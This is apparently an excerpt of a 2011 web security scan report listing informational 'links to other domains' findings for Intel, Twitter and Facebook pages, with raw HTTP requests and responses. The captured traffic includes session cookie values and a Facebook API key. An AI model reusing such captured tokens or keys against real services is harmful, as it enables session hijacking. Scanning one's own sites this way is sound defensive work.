<div class="tw_button" style=""><a onclick="_gaq.push(['wac._trackEvent', 'distribute', 'twitter', 'Online Gaming Tips for Newbies']);" href="http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fonline-gaming-tips-for-newbies%2F&amp;text=Online%20Gaming%20Tips%20for%20Newbies&amp;related=&amp;lang=en&amp;count=horizontal&amp;counturl=http%3A%2F%2Fscoop.intel.com%2Fonline-gaming-tips-for-newbies%2F" class="twitter-share-button" target="_blank" style="width:55px;height:22px;background:transparent url('http://scoop.intel.com/wp-content/plugins/wp-tweet-button/tweetn.png') no-repeat 0 0;text-align:left;text-indent:-9999px;display:block;">Tweet</a>
...[SNIP]...
<div class="post-head">
                           <img alt='' src='http://1.gravatar.com/avatar/bb30c1bfeba396c0e5fbc412da3bd1c7?s=50&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&amp;r=G' class='avatar avatar-50 photo' height='50' width='50' />                                                        <h2 class="entry-title">
...[SNIP]...
<div class="tw_button" style=""><a onclick="_gaq.push(['wac._trackEvent', 'distribute', 'twitter', 'Small Actions by Women at ...Blissdom... Can Spark Big Change']);" href="http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fsmall-actions-by-women-at-%25e2%2580%2598blissdom%25e2%2580%2599-can-spark-big-change%2F&amp;text=Small%20Actions%20by%20Women%20at%20%E2%80%98Blissdom%E2%80%99%20Can%20Spark%20Big%20Change&amp;related=&amp;lang=en&amp;count=horizontal&amp;counturl=http%3A%2F%2Fscoop.intel.com%2Fsmall-actions-by-women-at-%25e2%2580%2598blissdom%25e2%2580%2599-can-spark-big-change%2F" class="twitter-share-button" target="_blank" style="width:55px;height:22px;background:transparent url('http://scoop.intel.com/wp-content/plugins/wp-tweet-button/tweetn.png') no-repeat 0 0;text-align:left;text-indent:-9999px;display:block;">Tweet</a>
...[SNIP]...
<div class="post-head">
                           <img alt='' src='http://0.gravatar.com/avatar/2d0ee9aba2269cf05cd955703635d973?s=50&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&amp;r=G' class='avatar avatar-50 photo' height='50' width='50' />                                                        <h2 class="entry-title">
...[SNIP]...
<div class="tw_button" style=""><a onclick="_gaq.push(['wac._trackEvent', 'distribute', 'twitter', 'Growing Pains of Smart TV']);" href="http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fgrowing-pains-of-smart-tv%2F&amp;via=IntelSmartTV&amp;text=%28%23intel%20blog%29%20Growing%20pains%20of%20%23SmartTV&amp;related=IntelSmartTV&amp;lang=en&amp;count=horizontal&amp;counturl=http%3A%2F%2Fscoop.intel.com%2Fgrowing-pains-of-smart-tv%2F" class="twitter-share-button" target="_blank" style="width:55px;height:22px;background:transparent url('http://scoop.intel.com/wp-content/plugins/wp-tweet-button/tweetn.png') no-repeat 0 0;text-align:left;text-indent:-9999px;display:block;">Tweet</a>
...[SNIP]...
<div class="post-head">
                           <img alt='' src='http://0.gravatar.com/avatar/eb016697bec86ef21c9bffa1efcd5ff0?s=50&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&amp;r=G' class='avatar avatar-50 photo' height='50' width='50' />                                                        <h2 class="entry-title">
...[SNIP]...
<div class="tw_button" style=""><a onclick="_gaq.push(['wac._trackEvent', 'distribute', 'twitter', 'Will.i.am Rocks Intel Sales and Marketing Conference']);" href="http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fwill-i-am-rocks-intel-sales-and-marketing-conference%2F&amp;text=Will.i.am%20Rocks%20Intel%20Sales%20and%20Marketing%20Conference&amp;related=&amp;lang=en&amp;count=horizontal&amp;counturl=http%3A%2F%2Fscoop.intel.com%2Fwill-i-am-rocks-intel-sales-and-marketing-conference%2F" class="twitter-share-button" target="_blank" style="width:55px;height:22px;background:transparent url('http://scoop.intel.com/wp-content/plugins/wp-tweet-button/tweetn.png') no-repeat 0 0;text-align:left;text-indent:-9999px;display:block;">Tweet</a>
...[SNIP]...
<div class="post-head">
                           <img alt='' src='http://0.gravatar.com/avatar/a322c0b1810867c520aff1736916882e?s=50&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D50&amp;r=G' class='avatar avatar-50 photo' height='50' width='50' />                                                        <h2 class="entry-title">
...[SNIP]...
<div class="tw_button" style=""><a onclick="_gaq.push(['wac._trackEvent', 'distribute', 'twitter', 'Medical Benefits and Computer Gaming.']);" href="http://twitter.com/share?url=http%3A%2F%2Fscoop.intel.com%2Fmedical-benefits-and-computer-gaming%2F&amp;text=Medical%20Benefits%20and%20Computer%20Gaming.&amp;related=&amp;lang=en&amp;count=horizontal&amp;counturl=http%3A%2F%2Fscoop.intel.com%2Fmedical-benefits-and-computer-gaming%2F" class="twitter-share-button" target="_blank" style="width:55px;height:22px;background:transparent url('http://scoop.intel.com/wp-content/plugins/wp-tweet-button/tweetn.png') no-repeat 0 0;text-align:left;text-indent:-9999px;display:block;">Tweet</a>
...[SNIP]...
</form>

<a href="http://feeds.feedburner.com/intel/scoop"><img src="/wp-content/themes/prose/images/btn_rss.gif" />
...[SNIP]...
<div style="width:200px; margin:8px 0 0 -5px;">
<a style="padding-right:5px;" href="http://twitter.com/intelscoop" onclick="_gaq.push([...wac._trackEvent..., ...link..., ...outgoing..., ...http://twitter.com/intelscoop...])"><img src="/wp-content/uploads/2010/11/ico_twitter.png" alt="Twitter" /></a><a style="padding-right:5px;" href="http://www.facebook.com/Intel" onclick="_gaq.push([...wac._trackEvent..., ...link..., ...outgoing..., ...http://facebook.com/intel...])"><img src="/wp-content/uploads/2010/11/ico_facebook.png" alt="Facebook" /></a><a href="http://www.youtube.com/user/channelintel#p/c/96B74107D701D2B1" onclick="_gaq.push([...wac._trackEvent..., ...link..., ...outgoing..., ...http://www.youtube.com/user/channelintel#p/c/96B74107D701D2B1...])"><img src="/wp-content/uploads/2010/11/ico_youtube.png" alt="Youtube" />
...[SNIP]...
<li>Check out: Online Gaming Tips for Newbies <a href="http://goo.gl/fb/TyNQw" target="_blank">http://goo.gl/fb/TyNQw</a>
...[SNIP]...
<span style="font-size: 85%;"><a href="http://twitter.com/intelscoop/status/32550600621162497" rel="nofollow">about 4 days ago</a>
...[SNIP]...
<li>Check out: Small Actions by Women at ...Blissdom... Can Spark Big Change <a href="http://goo.gl/fb/Cwlyk" target="_blank">http://goo.gl/fb/Cwlyk</a>
...[SNIP]...
<span style="font-size: 85%;"><a href="http://twitter.com/intelscoop/status/31024235971350528" rel="nofollow">about 8 days ago</a>
...[SNIP]...
<li>Check out: Growing Pains of Smart TV <a href="http://goo.gl/fb/uASg6" target="_blank">http://goo.gl/fb/uASg6</a>
...[SNIP]...
<span style="font-size: 85%;"><a href="http://twitter.com/intelscoop/status/30823114275299329" rel="nofollow">about 9 days ago</a>
...[SNIP]...
<li>will.i.am rocks <a href="http://search.twitter.com/search?q=intel" target="_blank">#intel</a> sales and marketing conference with news of his partnership with <a href="http://search.twitter.com/search?q=intel" target="_blank">#intel</a> <a href="http://intel.ly/hMMa02" target="_blank">http://intel.ly/hMMa02</a>
...[SNIP]...
<span style="font-size: 85%;"><a href="http://twitter.com/intelscoop/status/30028425678815232" rel="nofollow">about 11 days ago</a>
...[SNIP]...
<li><a href="http://www.twitter.com/iamwill" target="_blank">@iamwill</a> You rocked ISMC earlier today with announcement you're joining <a href="http://search.twitter.com/search?q=intel" target="_blank">#intel</a>. Looking forward to making <a href="http://search.twitter.com/search?q=intel" target="_blank">#intel</a>
...[SNIP]...
<span style="font-size: 85%;"><a href="http://twitter.com/intelscoop/status/30015538218401792" rel="nofollow">about 11 days ago</a>
...[SNIP]...
<div class="textwidget"><iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2FIntel&amp;width=185&amp;colorscheme=light&amp;connections=9&amp;stream=false&amp;header=false&amp;height=330" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:185px; height:330px; margin-left:-2px" allowTransparency="true"></iframe>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://0.gravatar.com/avatar/e296fcca944c6f86c51a337f85eb24be?s=63&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image admin'><img alt='' src='http://0.gravatar.com/avatar/eb016697bec86ef21c9bffa1efcd5ff0?s=63&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://0.gravatar.com/avatar/68b93e649bc65d3729f7a2f7c7087d89?s=63&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image editor'><img alt='' src='http://1.gravatar.com/avatar/5f2a79d1a0107b9561de9987f1d3b229?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image author'><img alt='' src='http://1.gravatar.com/avatar/5ece621b1bfcef68ee17551d8ccab2b1?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image author'><img alt='' src='http://0.gravatar.com/avatar/2a1d58e41b90c111c740ba1a86a77c1d?s=63&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://1.gravatar.com/avatar/39f49a4e373cca40fe9d15070d2864a1?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://1.gravatar.com/avatar/9ad701d61aeacd3bee9a4a08914c5c91?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://1.gravatar.com/avatar/34c5480f25ae43a3ea832abcb19c83c5?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://0.gravatar.com/avatar/e2940a91a2d9a89d4db9ded4e942f0f1?s=63&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image author'><img alt='' src='http://0.gravatar.com/avatar/a322c0b1810867c520aff1736916882e?s=63&amp;d=http%3A%2F%2F0.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://1.gravatar.com/avatar/96944303a89d5bd13886ec5a4376fb31?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image contributor'><img alt='' src='http://1.gravatar.com/avatar/78e32167099b3a0b5193cc17b67684cb?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<div class='content-image author'><img alt='' src='http://1.gravatar.com/avatar/bb30c1bfeba396c0e5fbc412da3bd1c7?s=63&amp;d=http%3A%2F%2F1.gravatar.com%2Favatar%2Fad516503a11cd5ca435acc9bb6523536%3Fs%3D63&amp;r=G' class='avatar avatar-63 photo' height='63' width='63' /><span>
...[SNIP]...
<li id="menu-item-915" class="menu-item menu-item-type-custom menu-item-915"><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.18. http://software.intel.com/en-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://software.intel.com
Path:   /en-us/

Issue detail

The page was loaded from a URL containing a query string:
  • http://software.intel.com/en-us/?iid=subhdr+devctr_sw
The response contains the following links to other domains:
  • http://feeds.feedburner.com/ISNMain
  • http://feeds.feedburner.com/IntelSoftwareNetworkBlog
  • http://www.appup.com/
  • http://www.appup.com/applications/applications-Cogs%20GO
  • http://www.appup.com/applications/applications-Mezzmo
  • http://www.appup.com/applications/applications-My%20Little%20Artist
  • http://www.appup.com/applications/applications-Nook%20for%20PC
  • http://www.appup.com/applications/applications-Party%20Booth%20Home
  • http://www.appup.com/applications/applications-Saucelifter
  • http://www.appup.com/applications/applications-Shufflr
  • http://www.appup.com/applications/applications-Unit%20Converter
  • http://www.appup.com/applications/applications-Yoono%20Desktop
  • http://www.appup.com/applications/applications-fizy%20desktop
  • http://www.appup.com/global/Assets/Image/thumbs/1482_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/1577_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/1661_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/173_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/2009_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/2258_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/2338_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/313_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/475_large_100x100.png
  • http://www.appup.com/global/Assets/Image/thumbs/554_large_100x100.png
  • http://www.google.com/calendar/embed?showTitle=0&showNav=0&showDate=0&showPrint=0&showTabs=0&showCalendars=0&showTz=0&mode=AGENDA&bgcolor=%23FFFFFF&src=d4ujatf9m387vdcakp1j0l5djo%40group.calendar.google.com&color=%230D7813&src=au0m47ahsn4cmcan48974fs9qg%40group.calendar.google.com&color=%231B887A&src=7u0mqometgt98rv17s9kb67dlc%40group.calendar.google.com&color=%232952A3&src=fobm39rg5omojmf2mi1kna0hso%40group.calendar.google.com&color=%23B1365F&src=eevlvkejjm9b1thsmcucj544nc%40group.calendar.google.com&color=%23BE6D00&src=cfusmveip1q2pe9un36ufnj2fo%40group.calendar.google.com&color=%235229A3&ctz=America%2FLos_Angeles
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /en-us/?iid=subhdr+devctr_sw HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
Date: Sat, 05 Feb 2011 23:21:34 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=4ae66bab79eb08b3fffa4262b94cdf90; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 77482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="en-us">
<he
...[SNIP]...
<b><a href="http://www.appup.com/">Latest Apps</a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Saucelifter">Saucelifter</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Saucelifter"><img src="http://www.appup.com/global/Assets/Image/thumbs/1577_large_100x100.png" alt="Saucelifter" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Unit%20Converter">Unit Converter</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Unit%20Converter"><img src="http://www.appup.com/global/Assets/Image/thumbs/2009_large_100x100.png" alt="Unit Converter" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Shufflr">Shufflr</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Shufflr"><img src="http://www.appup.com/global/Assets/Image/thumbs/2338_large_100x100.png" alt="Shufflr" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Cogs%20GO">Cogs Go</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Cogs%20GO"><img src="http://www.appup.com/global/Assets/Image/thumbs/1661_large_100x100.png" alt="Cogs Go" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-My%20Little%20Artist">My Little Artist</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-My%20Little%20Artist"><img src="http://www.appup.com/global/Assets/Image/thumbs/554_large_100x100.png" alt="My Little Artist" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Nook%20for%20PC">Nook</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Nook%20for%20PC"><img src="http://www.appup.com/global/Assets/Image/thumbs/2258_large_100x100.png" alt="Nook" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-fizy%20desktop">fizy Desktop</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-fizy%20desktop"><img src="http://www.appup.com/global/Assets/Image/thumbs/313_large_100x100.png" alt="fizy Desktop" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Mezzmo">Mezzmo</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Mezzmo"><img src="http://www.appup.com/global/Assets/Image/thumbs/475_large_100x100.png" alt="Mezzmo" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Party%20Booth%20Home">Party Booth Home</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Party%20Booth%20Home"><img src="http://www.appup.com/global/Assets/Image/thumbs/1482_large_100x100.png" alt="Party Booth Home" class="content-thumb" /></a>
...[SNIP]...
<h3><a href="http://www.appup.com/applications/applications-Yoono%20Desktop">Yoono Desktop</a>
...[SNIP]...
</p>
<a href="http://www.appup.com/applications/applications-Yoono%20Desktop"><img src="http://www.appup.com/global/Assets/Image/thumbs/173_large_100x100.png" alt="Yoono Desktop" class="content-thumb" /></a>
...[SNIP]...
</div>
<a href="http://feeds.feedburner.com/IntelSoftwareNetworkBlog" class="tl-rss-feed-icon"><img src="/media/home/media/icons/rss.gif">
...[SNIP]...
</h2>
<iframe src="http://www.google.com/calendar/embed?showTitle=0&amp;showNav=0&amp;showDate=0&amp;showPrint=0&amp;showTabs=0&amp;showCalendars=0&amp;showTz=0&amp;mode=AGENDA&amp;bgcolor=%23FFFFFF&amp;src=d4ujatf9m387vdcakp1j0l5djo%40group.calendar.google.com&amp;color=%230D7813&amp;src=au0m47ahsn4cmcan48974fs9qg%40group.calendar.google.com&amp;color=%231B887A&amp;src=7u0mqometgt98rv17s9kb67dlc%40group.calendar.google.com&amp;color=%232952A3&amp;src=fobm39rg5omojmf2mi1kna0hso%40group.calendar.google.com&amp;color=%23B1365F&amp;src=eevlvkejjm9b1thsmcucj544nc%40group.calendar.google.com&amp;color=%23BE6D00&amp;src=cfusmveip1q2pe9un36ufnj2fo%40group.calendar.google.com&amp;color=%235229A3&amp;ctz=America%2FLos_Angeles" style=" border-width:0 " scrolling="no" frameborder="0" height="100" width="210"></iframe>
...[SNIP]...
</a> -->
<a href="http://feeds.feedburner.com/ISNMain" target="_blank"><img src="/media/home/media/icons/rss2.gif" alt="RSS" />
...[SNIP]...
<div class="mod-box-220 light">
<a href="http://feeds.feedburner.com/ISNMain" class="tl-rss-feed-icon"><img src="/media/home/media/icons/rss.gif" alt="RSS" />
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.19. http://software.intel.com/sites/academic_showcase/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://software.intel.com
Path:   /sites/academic_showcase/

Issue detail

The page was loaded from a URL containing a query string:
  • http://software.intel.com/sites/academic_showcase/?iid=subhdr+ptr_academia
The response contains the following links to other domains:
  • http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
  • http://www.intc.com/index.cfm?iid=ftr+invrel

Request

GET /sites/academic_showcase/?iid=subhdr+ptr_academia HTTP/1.1
Host: software.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Language: en-us
X-Pingback: http://software.intel.com/en-us/services/comment/pingback/
Date: Sat, 05 Feb 2011 23:22:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=523518423a8c3158a7fdd8a54fb22c8d; path=/; domain=intel.com
Set-Cookie: loginpt=0
Content-Length: 50777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<head profile="http:
...[SNIP]...
<td align="center" valign="top"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,0,0" width="240" height="240" id="graphs-shape-tween-v2" align="middle">
<param name="allowScriptAccess" value="sameDomain" />
...[SNIP]...
<li><a href="http://www.intc.com/index.cfm?iid=ftr+invrel">Investor Relations</a>
...[SNIP]...

17.20. http://twitter.com/share  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /share

Issue detail

The page was loaded from a URL containing a query string:
  • http://twitter.com/share?url=
The response contains the following links to other domains:
  • http://s.twimg.com/images/favicon.ico
  • http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css

Request

GET /share?url= HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 403 Forbidden
Date: Sat, 05 Feb 2011 23:22:38 GMT
Server: hi
Status: 403 Forbidden
X-Transaction: Sat Feb 05 23:22:38 +0000 2011-2372-4030
Last-Modified: Sat, 05 Feb 2011 23:22:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 4792
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948158893760; path=/; expires=Sat, 12-Feb-11 23:22:38 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815891181481; path=/; expires=Mon, 07 Mar 2011 23:22:38 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCMBhIvgtAToHaWQiJWZmMmIxZmVlM2RiMTU4%250AZWUyMGUxNzdjYjAzN2QwNmQyIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--88b4fbe02017eb86e2f543e238abaf0c0d5bd291; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html>

<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="Content-Language" content="en-us" />
<title>Twitter / Valid URL par
...[SNIP]...
</title>
<link href="http://s.twimg.com/images/favicon.ico" rel="shortcut icon" type="image/x-icon" />
<link rel="stylesheet" href="http://yui.yahooapis.com/3.1.1/build/cssfonts/fonts-min.css" type="text/css" charset="utf-8">

<style type="text/css" media="screen">
...[SNIP]...

17.21. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.connect.facebook.com/widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name=&width=223&connections=0&stream=true&logobar=&css=
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
  • http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css
  • http://b.static.ak.fbcdn.net/rsrc.php/yp/r/mFutiZvI9yq.css
  • http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs426.ash2/71095_22707976849_1530726_q.jpg
  • http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif
  • http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js
  • http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name=&width=223&connections=0&stream=true&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sat, 05 Feb 2011 23:12:38 GMT
Content-Length: 8544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
</title>

<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yV/r/48SBskNJuXC.css" />
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yp/r/mFutiZvI9yq.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>

<link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a href="http://www.facebook.com/Intel" target="_blank"><img class="profileimage img" src="http://profile.ak.fbcdn.net/hprofile-ak-snc4/hs426.ash2/71095_22707976849_1530726_q.jpg" alt="Intel" /></a>
...[SNIP]...
<div class="page_stream_short" id="stream_content"><img class="loader img" src="http://static.ak.fbcdn.net/rsrc.php/y9/r/jKEcVPZFk-2.gif" width="32" height="32" /></div>
...[SNIP]...

17.22. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.connect.facebook.com/widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name&width=223&connections=0&stream=true&logobar&css
The response contains the following links to other domains:
  • http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
